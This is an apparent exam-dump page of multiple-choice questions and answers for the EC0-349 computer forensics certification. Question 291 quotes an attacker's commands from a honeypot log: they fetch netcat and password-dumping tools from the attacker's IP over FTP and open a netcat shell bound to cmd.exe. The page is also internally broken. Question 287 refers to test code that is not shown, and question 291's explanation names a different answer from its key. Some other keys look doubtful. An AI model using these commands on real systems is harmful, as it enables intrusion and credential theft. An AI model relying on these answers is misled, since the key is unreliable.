[Dec-2024] Updated and Accurate EC0-349 Questions & Answers for passing the exam Quickly
NEW QUESTION # 287
You are carrying out the last round of testing for your new website before it goes live. The website has many dynamic pages and connects to a SQL backend that accesses your product inventory in a database. You come across a web security site that recommends inputting the following code into a search field on web pages to check for vulnerabilities:
When you type this and click on search, you receive a pop-up window that says:
"This is a test."
What is the result of this test?
- A. Your website is vulnerable to CSS
- B. Your website is vulnerable to SQL injection
- C. Your website is vulnerable to web bugs
- D. Your website is not vulnerable
Answer: A
NEW QUESTION # 288
What is cold boot (hard boot)?
- A. It is the process of restarting a computer that is already in sleep mode
- B. It is the process of starting a computer from a powered-down or off state
- C. It is the process of shutting down a computer from a powered-on or on state
- D. It is the process of restarting a computer that is already turned on through the operating system
Answer: B
NEW QUESTION # 289
A forensics investigator needs to copy data from a computer to some type of removable media so he can examine the information at another location. The problem is that the data is around 42GB in size. What type of removable media could the investigator use?
- A. Blu-Ray dual-layer
- B. Blu-Ray single-layer
- C. HD-DVD
- D. DVD-18
Answer: A
NEW QUESTION # 290
Networks are vulnerable to an attack which occurs due to overextension of bandwidth, bottlenecks, network data interception, etc.
Which of the following network attacks refers to a process in which an attacker changes his or her IP address so that he or she appears to be someone else?
- A. Man-in-the-middle attack
- B. Session sniffing
- C. IP address spoofing
- D. Denial of Service attack
Answer: C
NEW QUESTION # 291
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query, which results in the commands shown below being run.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
- A. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
- B. It is a local exploit where the attacker logs in using username johna2k
- C. There are two attackers on the system - johna2k and haxedj00
- D. The attack is a remote exploit and the hacker downloads three files
Answer: D
Explanation:
The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.
NEW QUESTION # 292
After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a large organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts respond to your ICMP pings; definitely not the number of hosts you were expecting. Why did this ping sweep only produce a few responses?
- A. Only IBM AS/400 will reply to this scan
- B. Only Unix and Unix-like systems will reply to this scan
- C. A switched network will not respond to packets sent to the broadcast address
- D. Only Windows systems will reply to this scan
Answer: B
NEW QUESTION # 293
Which wireless standard has bandwidth up to 54 Mbps and signals in a regulated frequency spectrum around 5 GHz?
- A. 802.11a
- B. 802.11g
- C. 802.11b
- D. 802.11i
Answer: A
NEW QUESTION # 294
Files stored in the Recycle Bin in its physical location are renamed as Dxy.ext, where, "X" represents the _________.
- A. Sequential number
- B. Drive name
- C. Original file name's extension
- D. Original file name
Answer: B
NEW QUESTION # 295
Jason is the security administrator of ACMA metal Corporation. One day he notices the company's Oracle database server has been compromised and the customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors. Jason wants to report this crime to the law enforcement agencies immediately. Which organization coordinates computer crimes investigations throughout the United States?
- A. Internet Fraud Complaint Center
- B. Local or national office of the U.S. Secret Service
- C. CERT Coordination Center
- D. National Infrastructure Protection Center
Answer: B
NEW QUESTION # 296
Law enforcement officers are conducting a legal search for which a valid warrant was obtained.
While conducting the search, officers observe an item of evidence for an unrelated crime that was not included in the warrant. The item was clearly visible to the officers and immediately identified as evidence. What is the term used to describe how this evidence is admissible?
- A. Plain view doctrine
- B. Locard Exchange Principle
- C. Corpus delicti
- D. Ex Parte Order
Answer: A
NEW QUESTION # 297
Wireless access control attacks aim to penetrate a network by evading WLAN access control measures, such as AP MAC filters and Wi-Fi port access controls.
Which of the following wireless access control attacks allows the attacker to set up a rogue access point outside the corporate perimeter, and then lure the employees of the organization to connect to it?
- A. War driving
- B. MAC spoofing
- C. Rogue access points
- D. Client mis-association
Answer: D
NEW QUESTION # 298
One way to identify the presence of hidden partitions on a suspect hard drive is to:
- A. Add up the total size of all known partitions and compare it to the total size of the hard drive
- B. Examine the FAT and identify hidden partitions by noting an "H" in the "Partition Type" field
- C. It is not possible to have hidden partitions on a hard drive
- D. Examine the LILO and note an "H" in the "Partition Type" field
Answer: A
NEW QUESTION # 299
If you come across a sheepdip machine at your client site, what would you infer?
- A. A sheepdip computer is another name for a honeypot
- B. A sheepdip coordinates several honeypots
- C. A sheepdip computer defers a denial of service attack
- D. A sheepdip computer is used only for virus-checking.
Answer: D
NEW QUESTION # 300
What is the first step taken in an investigation for laboratory forensic staff members?
- A. Securing and evaluating the electronic crime scene
- B. Transporting the electronic evidence
- C. Packaging the electronic evidence
- D. Conducting preliminary interviews
Answer: A
NEW QUESTION # 301
Heather, a computer forensics investigator, is assisting a group of investigators working on a large computer fraud case involving over 20 people. These 20 people, working in different offices, allegedly siphoned off money from many different client accounts. Heather's responsibility is to find out how the accused people communicated between each other. She has searched their email and their computers and has not found any useful evidence. Heather then finds some possibly useful evidence under the desk of one of the accused. In an envelope she finds a piece of plastic with numerous holes cut out of it. Heather then finds the same exact piece of plastic with holes at many of the other accused people's desks. Heather believes that the 20 people involved in the case were using a cipher to send secret messages in between each other. What type of cipher was used by the accused in this case?
- A. Visual semagram
- B. Grill cipher
- C. Null cipher
- D. Text semagram
Answer: B
NEW QUESTION # 302
You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensics lab due to sensitivity of the case. How would you permanently erase the data on the hard disk?
- A. Run the powerful magnets over the hard disk
- B. Format the hard disk multiple times using a low level disk utility
- C. Overwrite the contents of the hard disk with Junk data
- D. Throw the hard disk into the fire
Answer: D
NEW QUESTION # 303
A deposition enables opposing counsel to preview an expert witness's testimony at trial. Which of the following is not a standard practice in a deposition?
- A. No jury or judge
- B. Opposing counsel asks questions
- C. Both attorneys are present
- D. Only one attorney is present
Answer: D
NEW QUESTION # 304
Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not succeed?
- A. Only DNS traffic can be hijacked
- B. HTTP protocol does not maintain session
- C. Only FTP traffic can be hijacked
- D. Only an HTTPS session can be hijacked
Answer: B
NEW QUESTION # 305
The following is a log file screenshot from a default installation of IIS 6.0.
What time standard is used by IIS as seen in the screenshot?
- A. UTC
- B. TAI
- C. UT
- D. GMT
Answer: A
